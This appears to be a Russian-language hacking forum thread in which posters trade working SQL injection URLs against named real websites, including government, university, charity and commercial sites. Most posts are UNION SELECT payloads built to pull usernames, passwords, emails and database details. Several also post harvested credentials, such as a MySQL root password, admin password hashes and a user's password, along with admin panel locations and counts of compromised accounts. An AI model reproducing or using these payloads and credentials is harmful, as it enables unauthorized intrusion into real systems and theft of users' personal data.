SQL Инъекции

Железо

Code:

http://www.legionhardware.com/document.php?id=-11111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(name,char(58),password),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users/*

Демократия в Америке

Code:

http://www.dfalink.com/event.php?id=-11111+UNION+SELECT+1,concat(email,char(58),password),3,4,5,6,7,8,9,10,concat(USER(),char(58),VERSION(),char(58),DATABASE()),12,13,14,15,16,17,18,19,20,21,22,23,24+from+members/*

Правда траблы с кодировкой пасса

 

http://www.ze-linux.org/index.php?id_news=-825+union+select+666/*

 

mc-laren.ru

Code:

http://www.mc-laren.ru/news.php?id=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12+from+users/*

а еще там есть форум...

 

Для НЕлюбителей косметики:

Code:

_http://www.wizaz.pl/porady/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/

Админка сайта тут:
_http://www.wizaz.pl/porady/admin.php

 

70 email'ов)))
kontrudar.ru

Code:

http://www.kontrudar.ru/material.php?id=15+and+0=-1+union+select+email,2,3,4,5,null,7,8,9,10,11,12,13+from+ic_subscribers+limit+70,1/*

тайтл

пробелы убирать надо

 

Клуб Выпускников Московского Физико-Технического Института

www.miptclub.ru

Code:

http://miptclub.ru/inner/modules/gallery/gallery.php?act=show_gallery&id=-1+union+sel ect+convert(version ()+using+binary)/ *

Admin: amavis
Password(hash):623deab31fd6dd48

Админка: www.miptclub.ru/admin

Уже мона коллекционировать - прошлый раз ассоциация выпускников МГИМО, теперь МФТИ!

 

__http://www-illigal.ge.uiuc.edu/system/reports/abstract.php?id=339992+union+select+1,2,3,4,5,6,AES _DECRYPT(AES_ENCRYPT(version(),0x73),0x73),8,9,10--

 

Center For Law and Social Policy

Code:

http://www.clasp.org/publications.php?id=-1111+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15+from+user/*

 

КВН в НГУ

 

sql-inj

Футбол. Луч-Энергия (Неофициальный сайт)

Сайт: http://luch-vlad.ru/index.php
уязвимость: http://luch-vlad.ru/index.php?option=com_datsogallery&func=detail&id='
подобранные таблицы: jos_users
подобранные поля: username,password,email,name
1960 организмов

admin:8e16abc167627ba17495079c609efa6d (111280)
админка

форум 2155 организмов

 

Ну, во-первых, не все сайты интересные и посещаемые, уязвимости есть не на всех, а на многих из тех, которые уязвимы, не всегда получается подобрать названия полезных таблиц. И еще реже получается попасть в админку и шелл заюзать.
Плюс бывают интересные особенности, фильтрации и т.п.

 

Dracula4ever сделай хотя бы одну иньекцию на asp

 

Что касается аспа...
Тут какая-то турецкая муть:

_http://www.banaz.bel.tr/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

для получения пасса меняем на "sifre"

Админка валяется тут:
http://www.banaz.bel.tr/admin/kontrol.asp

 

.gov

Code:

http://www.maineservicecommission.gov/MVF/article.php?ID=-111+UNION+SELECT+1,2,concat(USER(),char(58),VERSION(),char(58),DATABASE()),4,5,6,7,8,9,10,11,12,13/*

 

sql-inj

Футбол.

Сайт: www.liverpoolfc.ru
уязвимость: http://www.liverpoolfc.ru/news.php?id=1673'
подобранные таблицы: users
подобранные поля: user_name,user_pass,user_id
1:Jari:034054de62d75ca7

админка

Не окончено:
http://www.juventus.ru/photogallery.php?photo=-1702'+union+select+1,2,3,4,5,6,7,8,9/* - Проблемы с выводом

 

Code:

http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-1111+UNION+SELECT+1,2,name,4,5,6,7,8,9,10,11,12,13,14,15+from+user+limit+2,1/*

.gov

Code:

http://www.dswd.gov.ph/ProgProj.php?id=-1111+UNION+SELECT+1,2,concat(user,char(58),password),4,5,6+from+mysql.user/*

MySQL root:zaq12345

 

Code:

http://poetry.h1.ru/article.php?sid=-526+union+select+1,2,3,4,password,email,7,username,9,10,11+from+members/*

user:perfilov
password:248192
email:[email protected]

Code:

http://outyourbackdoor.com/article.php?id=-684/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/*

 

nero.com

Code:

http://www.nero.com/eng/showpress.php?id=-1+union+select+1,2,3/*

stpatsfc.com

Code:

http://www.stpatsfc.com/news.php?id=-1+union+select+1,2,3/*

 

Дракула и то и другое жесточайший боян- http://hlamidnik.h18.ru/SQLS.html

 

www.sdg.ncsa.uiuc.edu
Национальный Центр высокоэффективных вычислительных ресурсов NCSA

Code:

http://sdg.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1+union+select+1,concat(user(),0x203a20,database()),3,4,5,6,7,8,9,10/*